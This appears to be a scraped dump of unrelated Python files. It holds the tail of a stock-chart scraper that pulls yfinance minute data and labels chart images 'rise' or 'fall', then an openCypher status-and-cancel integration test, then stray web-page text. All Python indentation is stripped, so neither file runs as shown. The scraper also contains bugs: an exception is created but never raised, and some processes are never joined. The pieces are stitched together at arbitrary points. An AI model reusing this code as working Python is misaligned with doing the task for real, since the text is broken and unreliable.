CO","JQC","JDD","DIAX","JEMD","JMF","NEV","JFR","JRO","NKG","JGH","JHY","JHAA","JHB","NXC","NXN","NID","NMY","NMT","NUM","NMS","NOM","JLS","JMM","NHA","NZF","NMCO","NMZ","NMI","NJV","NXJ","NRK","NYV","NNY","NAN","NUO","NPN","NQP","JPC","JPS","JPT","JPI","NAD","JRI","JRS","BXMX","SPXX","NIM","NXP","NXQ","NXR","NSL","JSD","NBB","JTD","JTA","NPV","NIQ","NVT","NVR","CTEST","CTEST.","CTEST.","CTEST.","CTEST.","CTEST.","CTEST.","OAC","OAC.U","OAC.WS","OAK","OAK","OXY","OII","OCN","OFG","OFG","OFG","OFG","OGE","OI","OIBR.C","OIS","ODC","ORI","OLN","OHI","OMC","ONDK","OGS","OLP","OCFT","OMF","OKE","ONE","ONTO","OOMA"]
tickers5 = ["OPY","ORCL","ORAN","ORC","OEC","ORN","IX","ORA","OSK","OR","SFTW","SFTW.U","SFTW.W","OTIS","OUT","OSG","OVV","OMI","OC","ORCC","OXM","ROYT","PACD","PCG","PKG","PD","PAGS","PANW","PAM","PHX","PARR","PAR","PGRE","PKE","PK","PH","PE","PSN","PRE","PRE","PRE","PRE","PRTY","PAYC","PBF","PBFX","BTU","PSO","PEB","PEB","PEB","PEB","PEB","PBA","PEI","PEI","PEI","PEI","PFSI","PMT","PMT","PMT","PAG","PNR","PEN","PFGC","PKI","PBT","PVL","PRT","PRGO","PRSP","PTR","PBR","PBR.A","PFE","GHY","ISD","PGTI","PM","PSX","PSXP","FENG","DNK","PHR","DOC","PDM","PCQ","PCK","PZC","PCM","PTY","PCN","PCI","PDI","NRGX","PGP","PHK","PKO","PFL","PFN","PMF","PML","PMX","PNF","PNI","PYN","RCS","PING","PNW","PINS","PHD","PHT","MAV","MHI","PXD","PIPR","PBI","PBI","PIC","PIC.U","PIC.WS","PJT","PAA","PAGP","PLNT","PLT","AGS","PHI","PLYM","PNC","PNC","PNC","PNM","PII","POL","POR","PKX","POST","PSTL","PPG","PPX","PPL","PYS","PYT","PQG","PDS","APTS","PBH","PVG","PRI","PRMW","PGZ","PRIF","PRIF","PRIF","PRIF","PRIF","PRIF","PRA","PG","PGR","PLD","PUMP","PRO","PROS","PBB","PBC","PBY","PB","PRLB","PFS","PJH","PRH","PRS","PRU","PUK","PUKPUK","PSB","PSB","PSB","PSB","PSB","TLK","PEG","PSA","PSA","PSA","PSA","PSA","PSA","PSA","PSA","PSA","PSA","PSA","PSA","PSA","PSA","PHM","PSTG","PMM","PIM","PMO","PPT","NEW","PVH","PYX","PZN","QTWO","QEP","QGEN","QTS","QTS","QTS","QUAD","KWR","NX","PWR","QD","DGX","QES","QUOT","QVCC","QVCD","CTAA","CTBB","CTDD","CTV","CTY","CTZ","RRD","RMED","RDN","RFL","RL","RRC","RNGR","PACK","PACK.W","RJF","RYAM","RYN","RTX","RMAX","RC","RCA","RCB","RCP","RLGY","O","RLH","RWT","RBC","RM","RF","RF","RF","RF","RGS","RGA","RZA","RZB","RS","RELX","RNR","RNR","RNR","SOL","RENN","RPLA","RPLA.U","RPLA.W","RSG","REZI","RMD","RFP","QSR","RPAI","RVI","REVG","REV","RVLV","REX","REXR","REXR","REXR","REXR","RXN","RH","RNG","RIO","RBA","RAD","RFM","RMM","RMI","RIV","RMPLRS","OPP","RLI","RLJ","RLJ","RMG","RMG.U","RMG.WS","RRTS","RHI","ROK","RCI","ROG","ROL","ROP","RST","RY","RY","RBS","RCL","RDS.A","RDS.B","RGT","RMT","RVT","RES","RPM","RPT","RPT","RTW","RYB","R","RYI","RHP","SPGI","SBR","SB","SB","SB","SFE","SAFE","SAIL","CRM","SMM","SBH","SJT","SD","PER","SAND","SC","SAP","SAF","SAR","SSL","BFS","BFS","BFS","SCPE","SCPE.U","SCPE.W","SLB","SNDR","SWM","SAIC","SALT","SBNA","STNG","SMG","KTF","KSM","SRL","SCU","SCVX","SCVX.U","SCVX.W","SE","SA","CKH","SMHI","SDRL","SEE","SEAS","JBN","JBR","WTTR","SEM","SRE","SRE","SRE","SREA","ST","SXT","SQNS","SRG","SRG","SCI","SERV","NOW","SFL","SHAK","SJR","SHLX","SHW","SHG","SHOP","SSTK","SBSW","SIG","SBOW","SI","SPG","SPG","SSD","SHI","SITC","SITC","SITC","SITE","SIX","SJW","SKM","SKX","SKY","SLG","SLG","WORK","SM","SMAR","SNN","SNAP","SNA","SQM","SOGO","SOI","SWI","SAH","SON","SNE","SOR","SJI","SJIJ","SJIU","SCE","SCE","SCE","SCE","SCE","SO","SOJA","SOJB","SOJC","SOJD","SOLN","SCCO","LUV","SWX","SWN","SPAQ","SPAQ.U","SPAQ.W","SPE","SPE","SPB","SR","SR","SPR","SAVE","SRC","SRC","SPOT","SRLP","SPXC","FLOW","SQ","JOE","STAG","STAG","SSI","SMP","SXI","SWK"]
GAIN = 1.02
LOSS = 0.98
AVERAGE_TOTAL = 1
INTERVAL = 60
RESOLUTION = 12
if AVERAGE_TOTAL >= (INTERVAL // RESOLUTION) // 2:
raise NameError("Average Total cannot be less than half the Interval over Resolution.")
def stockGrabber(tickers):
for ticker in tickers:
for year in range(2020, 2021):
for month in range(5, 6):
for day in range(5, 6):
calendar = datetime.strptime(str(year) + "-" + str(month) + "-" + str(day), "%Y-%m-%d")
data = yf.download(ticker,
start=calendar,
end=datetime.strptime(str(year) + "-" + str(month) + "-" + str(day + 1),
"%Y-%m-%d"), interval="1m")
for x in range(11, 24):
try:
if datetime(2020, month, day).weekday() < 5:
FileNotFoundError("Wrong Day of the Week")
fig = plt.Figure()
ax = fig.add_subplot()
minute = 0
while minute <= INTERVAL:
start = pd.to_datetime(datetime(2020, month, day, x, minute))
finish = pd.to_datetime(datetime(2020, month, day, x, minute + (INTERVAL // RESOLUTION)))
oldEnd = pd.to_datetime(datetime(2020, month, day, x, minute + (INTERVAL // RESOLUTION)))
newEnd = None
if minute + (INTERVAL // RESOLUTION) * 2 > 59:
newEnd = pd.to_datetime(datetime(2020, month, day, x + 1, minute))
else:
newEnd = pd.to_datetime(datetime(2020, month, day, x, minute + (INTERVAL // RESOLUTION) * 2))
oldEndMean = data.loc[oldEnd][0]
newEndMean = data.loc[newEnd][0]
oldEndMean = oldEndMean / AVERAGE_TOTAL
newEndMean = newEndMean / AVERAGE_TOTAL
ref = data.loc[start][0]
ax.set_ylim(ref * .95, ref * 1.05)
lines = ax.plot(data.loc[start:finish, "Open"])
if newEndMean > (oldEndMean):
fig.savefig("rise." + str(day) + "-" + str(x) + " - " + str(minute)
+ " - " + ticker + ".png", bbox_inches='tight')
else:
fig.savefig("fall." + str(day) + "-" + str(x) + " - " + str(minute)
+ " - " + ticker + ".png", bbox_inches='tight')
minute += (INTERVAL // RESOLUTION)
lines.remove()
except:
print("missing or incorrect data - ")
print("Day: "+str(day) + " Hour: " + str(x) + " failed")
if __name__ == "__main__":
P0 = multiprocessing.Process(target=stockGrabber, args=(tickers0,))
P1 = multiprocessing.Process(target=stockGrabber, args=(tickers1,))
P2 = multiprocessing.Process(target=stockGrabber, args=(tickers2,))
P3 = multiprocessing.Process(target=stockGrabber, args=(tickers3,))
P4 = multiprocessing.Process(target=stockGrabber, args=(tickers4,))
P5 = multiprocessing.Process(target=stockGrabber, args=(tickers5,))
P0.start()
P1.start()
P2.start()
P3.start()
P4.start()
P5.start()
P1.join()
P2.join()
P3.join()
P4.join() |
test_opencypher_status_with_iam.py | """
Copyright Amazon.com, Inc. or its affiliates. All Rights Reserved.
SPDX-License-Identifier: Apache-2.0
"""
import threading
import logging
import time
import pytest
import requests
from botocore.session import get_session
from test.integration.DataDrivenOpenCypherTest import DataDrivenOpenCypherTest
logger = logging.getLogger('TestOpenCypherStatusWithoutIam')
class TestOpenCypherStatusWithIam(DataDrivenOpenCypherTest):
def do_opencypher_query_save_result(self, query, res):
try:
result = self.client.opencypher_http(query)
result.raise_for_status()
res['result'] = result.json()
except requests.HTTPError as exception:
res['error'] = exception.response.json()
def setUp(self) -> None:
super().setUp()
self.client = self.client_builder.with_iam(get_session()).build()
status_res = self.client.opencypher_status()
assert status_res.status_code == 200
res = status_res.json()
for q in res['queries']:
self.client.opencypher_cancel(q['queryId'])
def test_do_opencypher_status_nonexistent(self):
query_id = "ac7d5a03-00cf-4280-b464-edbcbf51ffce"
status_res = self.client.opencypher_status(query_id)
assert status_res.status_code != 200
err = status_res.json()
self.assertEqual(err['code'], "InvalidParameterException")
expected_message = f'Supplied queryId {query_id} is invalid'
self.assertEqual(err['detailedMessage'], expected_message)
def test_do_opencypher_cancel_nonexistent(self):
query_id = "ac7d5a03-00cf-4280-b464-edbcbf51ffce"
cancel_res = self.client.opencypher_cancel(query_id)
assert cancel_res.status_code != 200
err = cancel_res.json()
self.assertEqual(err['code'], "InvalidParameterException")
expected_message = f'Supplied queryId {query_id} is invalid'
self.assertEqual(err['detailedMessage'], expected_message)
def test_do_opencypher_cancel_empty_query_id(self):
with pytest.raises(ValueError) as err:
self.client.opencypher_cancel('')
assert err.type is ValueError
def test_do_opencypher_cancel_non_str_query_id(self):
with pytest.raises(ValueError) as err:
self.client.opencypher_cancel(42)
assert err.type is ValueError
def test_do_opencypher_status_and_cancel(self):
query = '''MATCH(a)-->(b)
MATCH(c)-->(d)
MATCH(e)-->(f)
RETURN a,b,c,d,e,f
ORDER BY a'''
query_res = {}
oc_query_thread = threading.Thread(target=self.do_opencypher_query_save_result, args=(query, query_res,))
oc_query_thread.start()
time.sleep(1)
status = self.client.opencypher_status()
status_res = status.json()
assert type(status_res) is dict
assert 'acceptedQueryCount' in status_res
assert 'runningQueryCount' in status_res
assert status_res['runningQueryCount'] >= 1
assert 'queries' in status_res
query_id = ''
for q in status_res['queries']:
if query in q['queryString']:
query_id = q['queryId']
assert query_id != ''
cancel = self.client.opencypher_cancel(query_id)
assert cancel.status_code == 200
cancel_res = cancel.json()
assert type(cancel_res) is dict
assert cancel_res['status'] == '200 OK'
oc_query_thread.join()
assert 'result' not in query_res
assert 'error' in query_res
assert 'code' in query_res['error']
assert 'requestId' in query_res['error']
assert 'detailedMessage' in query_res['error']
assert 'CancelledByUserException' == query_res['error']['code']
def test_do_sparql_status_and_cancel_silently(self):
query = '''MATCH(a)-->(b)
MATCH(c)-->(d)
MATCH(e)-->(f)
RETURN a,b,c,d,e,f
ORDER BY a'''
query_res = {}
oc_query_thread = threading.Thread(target=self.do_opencypher_query_save_result, args=(query, query_res,))
oc_query_thread.start()
time.sleep(1)
query_id = ''
status = self.client.opencypher_status(query_id)
assert status.status_code == 200
status_res = status.json()
assert type(status_res) is dict
assert 'acceptedQueryCount' in status_res
assert 'runningQueryCount' in status_res
assert 1 == status_res['runningQueryCount']
assert 'queries' in status_res
query_id = ''
for q in status_res['queries']:
if query in q['queryString']:
query_id = q['queryId']
assert query_id != ''
self.assertNotEqual(query_id, '')
cancel = self.client.opencypher_cancel(query_id, silent=True)
cancel_res = cancel.json()
assert type(cancel_res) is dict
assert cancel_res['status'] == '200 OK'
oc_query_thread.join()
assert type(query_res['result']) is dict
assert 'a' in query_res['result']['head']['vars']
assert 'b' in query_res['result']['head']['vars']
assert 'c' in query_res['result']['head']['vars']
assert 'd' in query_res['result']['head']['vars']
assert [] == query_res['result']['results']['bindings']
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.